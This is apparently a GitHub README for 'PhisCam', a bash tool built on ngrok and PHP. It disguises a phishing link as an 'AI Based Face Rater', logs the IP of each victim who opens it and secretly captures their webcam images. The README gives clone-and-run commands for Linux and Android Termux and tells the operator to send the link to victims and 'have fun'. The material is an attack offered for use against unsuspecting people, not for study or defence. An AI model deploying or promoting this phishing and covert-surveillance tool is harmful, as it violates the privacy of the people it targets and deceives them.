iamharshdev / Phiscam

Bash Script to take WebcamShots of victim using a link
MIT License
2 stars 11 forks source link

PhisCam :fire:

PhisCam is a bash script made using php,html,js and it fools the victim that it's a AI Based Face Rater but really it's not so you just have to run this script in your terminal only if you have bash terminal on pc or termux on android and this script will download some requireddependencies and ngrok for hostingthe website on the internet so that you can send that link to your victim as soon as victim opens it you will get his ip listed in your terminal and this script will start taking his/her pics using webcam and it will send pics to your local machine in the same folder where script is located and now you can have fun. Thanks for Using😊

Caution

Try it on your own risk and you will be responsible for everything you do with this script.

Preview :smile:

Usage

Linux Users (PC) :smiling_imp: :smiling_imp:

git clone https://github.com/iamharshdev/Phiscam.git
cd Phiscam
chmod +x PhisCam.sh
./PhisCam.sh

Your script will be started as soon as :cool:

Termux Users (Android) :boom: :boom:

First turn on your hotspot otherwise direct link will not be visible

apt-get update && apt-get upgrade
git clone https://github.com/iamharshdev/Phiscam.git
cd Phiscam
chmod +x PhisCam.sh
./PhisCam.sh

Credits :alien: :alien:

Base Script : https://github.com/thelinuxchoice/saycheese

Name Suggestions:Himanshu Verma

Developer:Me😅(Harsh Vardhan Goswami)

Debugger: Lohit Kaushik He fixed it for mobile devices.

Contribution

You can also contribute to this script.Just Fork this to your account and create a pull request with meaningful changes and i will merge it with master.